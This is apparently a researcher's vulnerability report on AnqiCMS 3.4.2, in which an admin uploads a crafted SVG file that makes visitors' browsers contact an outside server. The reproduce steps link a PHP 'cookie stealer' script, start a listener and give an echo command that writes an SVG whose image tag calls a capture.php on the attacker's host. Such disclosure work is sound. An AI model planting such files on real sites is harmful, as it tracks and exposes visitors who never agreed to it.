AnqiCMS | XSS via SVG image upload
Information
| Software Type | Web App |
|---|---|
| Software Name | Anqi CMS |
| Affected Version | 3.4.2 |
| Software Vendor | Fesiong |
| Software Link | https://github.com/fesiong/anqicms |
| Severity | Low |
| CVSS Score | 3.4 |
| CVE Link | N/A |
| Affected Assets | 100+ |
| Date of Discovery | Jan 8th, 2025 |
| PoC Exploit | N/A |
Description
AnqiCMS allows logged in admins to upload files through [/system/archive/attachment] endpoint. Files that are uploaded here, can be shown anywhere else on the site to both users and admins.
I haven't beeen able to escalate this vulnerability to steal the bearer token from custom HTTP header called “admin” but this vulnerability can still be used for redirecting users to malicious sites or grabbing their IP address and browser info.
Reproduce
To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Launch a PHP server to serve this file:
> php -S 0.0.0.0:1718
Login to an admin account, navigate to [/system/archive/attachment] endpoint.
Create a malicious SVG file that sends a HTTP request to your server:
echo ‘<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"><image href="http://127.0.0.1:1718/capture.php" width="100" height="100" /></svg>’ > malicious.svgClick on “Upload new resources” button and select the file from your computer. Once uploaded, click on the file and a window will popup and show the SVG's full path:
http://127.0.0.1:8001/uploads/202501/09/b1c301bf3778fd28.svg
Open this and watch your server for connections.
Proof of Concept (PoC) Video
Posted on: May 24, 2025 02:16 AM